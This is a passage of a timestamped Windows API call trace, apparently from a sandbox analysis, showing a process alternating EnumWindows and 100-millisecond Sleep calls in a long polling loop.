[0148.430] Sleep (dwMilliseconds=0x64) [0148.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.442] Sleep (dwMilliseconds=0x64) [0148.458] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.458] Sleep (dwMilliseconds=0x64) [0148.475] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.475] Sleep (dwMilliseconds=0x64) [0148.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.521] Sleep (dwMilliseconds=0x64) [0148.552] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.552] Sleep (dwMilliseconds=0x64) [0148.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.567] Sleep (dwMilliseconds=0x64) [0148.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.584] Sleep (dwMilliseconds=0x64) [0148.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.599] Sleep (dwMilliseconds=0x64) [0148.614] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.615] Sleep (dwMilliseconds=0x64) [0148.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.630] Sleep (dwMilliseconds=0x64) [0148.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.645] Sleep (dwMilliseconds=0x64) [0148.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.708] Sleep (dwMilliseconds=0x64) [0148.737] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.737] Sleep (dwMilliseconds=0x64) [0148.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.754] Sleep (dwMilliseconds=0x64) [0148.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.770] Sleep (dwMilliseconds=0x64) [0148.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.787] Sleep (dwMilliseconds=0x64) [0148.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.803] Sleep (dwMilliseconds=0x64) [0148.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.818] Sleep (dwMilliseconds=0x64) [0148.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.833] Sleep (dwMilliseconds=0x64) [0148.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.896] Sleep (dwMilliseconds=0x64) [0148.922] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.922] Sleep (dwMilliseconds=0x64) [0148.927] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.927] Sleep (dwMilliseconds=0x64) [0148.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.942] Sleep (dwMilliseconds=0x64) [0148.958] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.959] Sleep (dwMilliseconds=0x64) [0148.975] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.976] Sleep (dwMilliseconds=0x64) [0148.989] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.989] Sleep (dwMilliseconds=0x64) [0149.006] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.006] Sleep (dwMilliseconds=0x64) [0149.021] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.021] Sleep (dwMilliseconds=0x64) [0149.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.036] Sleep (dwMilliseconds=0x64) [0149.131] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.132] Sleep (dwMilliseconds=0x64) [0149.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.152] Sleep (dwMilliseconds=0x64) [0149.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.161] Sleep (dwMilliseconds=0x64) [0149.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.177] Sleep (dwMilliseconds=0x64) [0149.194] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.194] Sleep (dwMilliseconds=0x64) [0149.211] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.212] Sleep (dwMilliseconds=0x64) [0149.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.230] Sleep (dwMilliseconds=0x64) [0149.241] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.242] Sleep (dwMilliseconds=0x64) [0149.303] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.303] Sleep (dwMilliseconds=0x64) [0149.322] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.322] Sleep (dwMilliseconds=0x64) [0149.334] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.335] Sleep (dwMilliseconds=0x64) [0149.350] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.351] Sleep (dwMilliseconds=0x64) [0149.367] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.367] Sleep (dwMilliseconds=0x64) [0149.407] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.408] Sleep (dwMilliseconds=0x64) [0149.411] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.411] Sleep (dwMilliseconds=0x64) [0149.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.473] Sleep (dwMilliseconds=0x64) [0149.498] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.499] Sleep (dwMilliseconds=0x64) [0149.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.505] Sleep (dwMilliseconds=0x64) [0149.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.520] Sleep (dwMilliseconds=0x64) [0149.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.536] Sleep (dwMilliseconds=0x64) [0149.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.552] Sleep (dwMilliseconds=0x64) [0149.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.567] Sleep (dwMilliseconds=0x64) [0149.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.583] Sleep (dwMilliseconds=0x64) [0149.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.645] Sleep (dwMilliseconds=0x64) [0149.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.661] Sleep (dwMilliseconds=0x64) [0149.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.676] Sleep (dwMilliseconds=0x64) [0149.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.692] Sleep (dwMilliseconds=0x64) [0149.712] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.712] Sleep (dwMilliseconds=0x64) [0149.724] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.724] Sleep (dwMilliseconds=0x64) [0149.740] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.740] Sleep (dwMilliseconds=0x64) [0149.758] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.758] Sleep (dwMilliseconds=0x64) [0149.816] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.817] Sleep (dwMilliseconds=0x64) [0149.843] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.844] Sleep (dwMilliseconds=0x64) [0149.853] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.853] Sleep (dwMilliseconds=0x64) [0149.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.864] Sleep (dwMilliseconds=0x64) [0149.881] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.881] Sleep (dwMilliseconds=0x64) [0149.896] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.896] Sleep (dwMilliseconds=0x64) [0149.911] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.911] Sleep (dwMilliseconds=0x64) [0149.927] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.927] Sleep (dwMilliseconds=0x64) [0149.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.942] Sleep (dwMilliseconds=0x64) [0149.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0149.958] Sleep (dwMilliseconds=0x64) [0150.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.006] Sleep (dwMilliseconds=0x64) [0150.022] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.022] Sleep (dwMilliseconds=0x64) [0150.037] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.038] Sleep (dwMilliseconds=0x64) [0150.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.052] Sleep (dwMilliseconds=0x64) [0150.068] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.069] Sleep (dwMilliseconds=0x64) [0150.084] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.084] Sleep (dwMilliseconds=0x64) [0150.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.101] Sleep (dwMilliseconds=0x64) [0150.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.114] Sleep (dwMilliseconds=0x64) [0150.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.176] Sleep (dwMilliseconds=0x64) [0150.204] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.205] Sleep (dwMilliseconds=0x64) [0150.231] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.231] Sleep (dwMilliseconds=0x64) [0150.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.317] Sleep (dwMilliseconds=0x64) [0150.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.365] Sleep (dwMilliseconds=0x64) [0150.400] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.400] Sleep (dwMilliseconds=0x64) [0150.412] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.412] Sleep (dwMilliseconds=0x64) [0150.427] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.428] Sleep (dwMilliseconds=0x64) [0150.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.444] Sleep (dwMilliseconds=0x64) [0150.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.461] Sleep (dwMilliseconds=0x64) [0150.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.474] Sleep (dwMilliseconds=0x64) [0150.492] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.492] Sleep (dwMilliseconds=0x64) [0150.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.552] Sleep (dwMilliseconds=0x64) [0150.571] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.571] Sleep (dwMilliseconds=0x64) [0150.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.583] Sleep (dwMilliseconds=0x64) [0150.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.599] Sleep (dwMilliseconds=0x64) [0150.615] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.615] Sleep (dwMilliseconds=0x64) [0150.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.630] Sleep (dwMilliseconds=0x64) [0150.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.646] Sleep (dwMilliseconds=0x64) [0150.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.661] Sleep (dwMilliseconds=0x64) [0150.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.723] Sleep (dwMilliseconds=0x64) [0150.749] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.750] Sleep (dwMilliseconds=0x64) [0150.761] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.762] Sleep (dwMilliseconds=0x64) [0150.774] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.774] Sleep (dwMilliseconds=0x64) [0150.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.787] Sleep (dwMilliseconds=0x64) [0150.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.801] Sleep (dwMilliseconds=0x64) [0150.818] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.819] Sleep (dwMilliseconds=0x64) [0150.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.833] Sleep (dwMilliseconds=0x64) [0150.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.849] Sleep (dwMilliseconds=0x64) [0150.865] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.866] Sleep (dwMilliseconds=0x64) [0150.912] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.913] Sleep (dwMilliseconds=0x64) [0150.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.934] Sleep (dwMilliseconds=0x64) [0150.947] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.947] Sleep (dwMilliseconds=0x64) [0150.959] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.959] Sleep (dwMilliseconds=0x64) [0150.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.973] Sleep (dwMilliseconds=0x64) [0150.989] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0150.989] Sleep (dwMilliseconds=0x64) [0151.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.005] Sleep (dwMilliseconds=0x64) [0151.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.020] Sleep (dwMilliseconds=0x64) [0151.083] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.083] Sleep (dwMilliseconds=0x64) [0151.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.099] Sleep (dwMilliseconds=0x64) [0151.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.114] Sleep (dwMilliseconds=0x64) [0151.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.130] Sleep (dwMilliseconds=0x64) [0151.146] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.147] Sleep (dwMilliseconds=0x64) [0151.162] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.163] Sleep (dwMilliseconds=0x64) [0151.177] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.177] Sleep (dwMilliseconds=0x64) [0151.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.192] Sleep (dwMilliseconds=0x64) [0151.208] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.209] Sleep (dwMilliseconds=0x64) [0151.259] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.259] Sleep (dwMilliseconds=0x64) [0151.294] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.295] Sleep (dwMilliseconds=0x64) [0151.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.301] Sleep (dwMilliseconds=0x64) [0151.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.318] Sleep (dwMilliseconds=0x64) [0151.333] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.333] Sleep (dwMilliseconds=0x64) [0151.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.349] Sleep (dwMilliseconds=0x64) [0151.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.365] Sleep (dwMilliseconds=0x64) [0151.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.394] Sleep (dwMilliseconds=0x64) [0151.490] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.491] Sleep (dwMilliseconds=0x64) [0151.518] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.518] Sleep (dwMilliseconds=0x64) [0151.524] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.525] Sleep (dwMilliseconds=0x64) [0151.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.536] Sleep (dwMilliseconds=0x64) [0151.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.552] Sleep (dwMilliseconds=0x64) [0151.570] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.571] Sleep (dwMilliseconds=0x64) [0151.614] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0151.615] Sleep (dwMilliseconds=0x64) [0152.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0152.177] Sleep (dwMilliseconds=0x64) [0152.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0152.257] Sleep (dwMilliseconds=0x64) [0152.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0152.536] Sleep (dwMilliseconds=0x64) [0152.651] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0152.651] Sleep (dwMilliseconds=0x64) [0153.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.101] Sleep (dwMilliseconds=0x64) [0153.161] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.162] Sleep (dwMilliseconds=0x64) [0153.352] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.352] Sleep (dwMilliseconds=0x64) [0153.499] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.499] Sleep (dwMilliseconds=0x64) [0153.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.552] Sleep (dwMilliseconds=0x64) [0153.633] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.634] Sleep (dwMilliseconds=0x64) [0153.738] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.739] Sleep (dwMilliseconds=0x64) [0153.798] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.799] Sleep (dwMilliseconds=0x64) [0153.820] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.821] Sleep (dwMilliseconds=0x64) [0153.840] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.841] Sleep (dwMilliseconds=0x64) [0153.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.849] Sleep (dwMilliseconds=0x64) [0153.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.864] Sleep (dwMilliseconds=0x64) [0153.882] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.882] Sleep (dwMilliseconds=0x64) [0153.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0153.990] Sleep (dwMilliseconds=0x64) [0154.011] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.012] Sleep (dwMilliseconds=0x64) [0154.019] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.020] Sleep (dwMilliseconds=0x64) [0154.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.037] Sleep (dwMilliseconds=0x64) [0154.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.052] Sleep (dwMilliseconds=0x64) [0154.069] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.069] Sleep (dwMilliseconds=0x64) [0154.082] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.082] Sleep (dwMilliseconds=0x64) [0154.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.098] Sleep (dwMilliseconds=0x64) [0154.146] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.146] Sleep (dwMilliseconds=0x64) [0154.187] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.187] Sleep (dwMilliseconds=0x64) [0154.191] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.192] Sleep (dwMilliseconds=0x64) [0154.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.208] Sleep (dwMilliseconds=0x64) [0154.245] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.245] Sleep (dwMilliseconds=0x64) [0154.254] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.254] Sleep (dwMilliseconds=0x64) [0154.269] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.270] Sleep (dwMilliseconds=0x64) [0154.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.333] Sleep (dwMilliseconds=0x64) [0154.359] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.359] Sleep (dwMilliseconds=0x64) [0154.363] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.364] Sleep (dwMilliseconds=0x64) [0154.383] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.383] Sleep (dwMilliseconds=0x64) [0154.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.395] Sleep (dwMilliseconds=0x64) [0154.412] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.412] Sleep (dwMilliseconds=0x64) [0154.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.426] Sleep (dwMilliseconds=0x64) [0154.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.442] Sleep (dwMilliseconds=0x64) [0154.458] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.458] Sleep (dwMilliseconds=0x64) [0154.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.474] Sleep (dwMilliseconds=0x64) [0154.578] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.579] Sleep (dwMilliseconds=0x64) [0154.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.603] Sleep (dwMilliseconds=0x64) [0154.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.614] Sleep (dwMilliseconds=0x64) [0154.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.630] Sleep (dwMilliseconds=0x64) [0154.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.645] Sleep (dwMilliseconds=0x64) [0154.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.662] Sleep (dwMilliseconds=0x64) [0154.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.676] Sleep (dwMilliseconds=0x64) [0154.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.692] Sleep (dwMilliseconds=0x64) [0154.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.754] Sleep (dwMilliseconds=0x64) [0154.781] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.782] Sleep (dwMilliseconds=0x64) [0154.785] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.785] Sleep (dwMilliseconds=0x64) [0154.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.801] Sleep (dwMilliseconds=0x64) [0154.816] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.817] Sleep (dwMilliseconds=0x64) [0154.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.833] Sleep (dwMilliseconds=0x64) [0154.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.849] Sleep (dwMilliseconds=0x64) [0154.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.864] Sleep (dwMilliseconds=0x64) [0154.884] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.884] Sleep (dwMilliseconds=0x64) [0154.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.895] Sleep (dwMilliseconds=0x64) [0154.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.943] Sleep (dwMilliseconds=0x64) [0154.982] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0154.983] Sleep (dwMilliseconds=0x64) [0155.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.005] Sleep (dwMilliseconds=0x64) [0155.019] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.020] Sleep (dwMilliseconds=0x64) [0155.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.036] Sleep (dwMilliseconds=0x64) [0155.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.051] Sleep (dwMilliseconds=0x64) [0155.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.067] Sleep (dwMilliseconds=0x64) [0155.082] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.082] Sleep (dwMilliseconds=0x64) [0155.117] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.118] Sleep (dwMilliseconds=0x64) [0155.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.152] Sleep (dwMilliseconds=0x64) [0155.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.160] Sleep (dwMilliseconds=0x64) [0155.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.176] Sleep (dwMilliseconds=0x64) [0155.201] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.201] Sleep (dwMilliseconds=0x64) [0155.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.207] Sleep (dwMilliseconds=0x64) [0155.228] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.228] Sleep (dwMilliseconds=0x64) [0155.239] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.239] Sleep (dwMilliseconds=0x64) [0155.291] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.291] Sleep (dwMilliseconds=0x64) [0155.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.349] Sleep (dwMilliseconds=0x64) [0155.363] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.364] Sleep (dwMilliseconds=0x64) [0155.404] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.404] Sleep (dwMilliseconds=0x64) [0155.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.411] Sleep (dwMilliseconds=0x64) [0155.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.426] Sleep (dwMilliseconds=0x64) [0155.455] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.456] Sleep (dwMilliseconds=0x64) [0155.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.495] Sleep (dwMilliseconds=0x64) [0155.570] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.570] Sleep (dwMilliseconds=0x64) [0155.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.583] Sleep (dwMilliseconds=0x64) [0155.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.598] Sleep (dwMilliseconds=0x64) [0155.615] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.615] Sleep (dwMilliseconds=0x64) [0155.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.645] Sleep (dwMilliseconds=0x64) [0155.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.661] Sleep (dwMilliseconds=0x64) [0155.710] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.711] Sleep (dwMilliseconds=0x64) [0155.743] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.744] Sleep (dwMilliseconds=0x64) [0155.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.754] Sleep (dwMilliseconds=0x64) [0155.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.770] Sleep (dwMilliseconds=0x64) [0155.785] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.786] Sleep (dwMilliseconds=0x64) [0155.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.802] Sleep (dwMilliseconds=0x64) [0155.816] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.817] Sleep (dwMilliseconds=0x64) [0155.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.833] Sleep (dwMilliseconds=0x64) [0155.883] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.883] Sleep (dwMilliseconds=0x64) [0155.910] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.911] Sleep (dwMilliseconds=0x64) [0155.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.957] Sleep (dwMilliseconds=0x64) [0155.974] EnumWindows (lpEnumFunc=0x423dd0, 